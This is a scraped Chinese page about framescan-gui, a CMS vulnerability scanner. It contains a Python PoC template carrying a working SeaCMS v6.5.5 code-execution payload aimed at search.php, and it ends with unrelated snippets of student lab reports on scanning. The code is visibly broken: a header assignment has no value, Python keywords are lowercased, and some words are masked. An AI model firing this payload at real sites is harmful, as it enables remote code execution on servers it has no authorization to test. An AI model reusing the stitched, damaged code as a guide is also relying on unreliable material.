framescan-gui是一款python3和pyqt編寫的具有圖形化介面的cms漏洞檢測框架,是framescan的加強版。支援多種檢測方式,支援大多數cms,可以自定義cms型別及自行編寫poc。旨在幫助有安全經驗的安全工程師對已知的應用快速發現漏洞。
- windows
以下為poc模板,請盡量規範編寫。指令碼中為示例**。
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''name: 漏洞名稱(禁止換行)控制在30字以內
referer: 漏洞位址(禁止換行)未知請填unknown
author: 作者名
description: 漏洞描述
'''import sys
import requests
import warnings
def run(url):
#此處編輯檢測**
#示例**,請更改result內容,result[0]為漏洞名稱,result[1]為返回的內容,result[2]為測試結果
result = ['seacms v6.5.5**執行漏洞','','']
headers =
payload = "searchtype=5&searchword=&year=:as}&area=s&letter=ert&yuyan=($_se&jq=rver&&ver=[query_string]));/*"
url_path = url + "/search.php?phpinfo();"
try:
data = requests.get(url_path, timeout=3,headers=headers, verify=false)
if data.status_code == 200 and 'phpinfo' in data.text:
result[2]= "存在"
result[1] = "url:%s\npost:%s"%(url_path,payload)
else:
result[2] = "不存在"
except exception as e:
# print (e)
result[2] ="不存在"
#這裡可設定未知,連線超時等,只有不存在不會顯示到結果中。
return result
#最後一定要返回乙個帶有3個引數的列表。不然會出錯誤。
if __name__ == "__main__":
#此處不會呼叫
warnings.filterwarnings("ignore")
testvuln = run("")
print(testvuln)
請勿用於非法用途!否則自行承擔一切後果
20155339 Exp6 資訊蒐集與漏洞掃瞄
1 哪些組織負責dns,ip的管理。2 什麼是3r資訊。是指註冊人 registrant 註冊商 registrar 以及官方註冊局 registry 3 評價下掃瞄結果的準確性。個人認為掃瞄的還是比較準確的吧,與自己所知道的地方沒有發現不符的。發現這門課越學越害怕,之前學的東西好歹也是假裝很高階的...
20145304 Exp6 資訊蒐集與漏洞掃瞄
這次的實驗不是很順利,出現的問題較多,並沒有找到很好的解決方法,還是像之前一樣換乙個要不就卸掉重灌。通過此次實驗,我掌握了一些資訊蒐集的方法,埠開放情況 漏洞和作業系統的掃瞄在上學期的信安概論實驗中操作過,但當時是在實驗室的虛擬機器中,利用了nmap和x scan,這次實驗重新使用了nmap,感覺它...
20145305 《網路對抗》資訊蒐集與漏洞掃瞄
dns與ip查詢 whois命令 查詢3r註冊資訊 註冊人 註冊商 官方註冊局 發現不是很多資訊,又去看一下網易的 nslookup dig命令 使用dig是從官方dns伺服器上查詢精確的結果,若使用nslookup則是得到dns解析伺服器快取的結果 tracert路由探測 windows下 lin...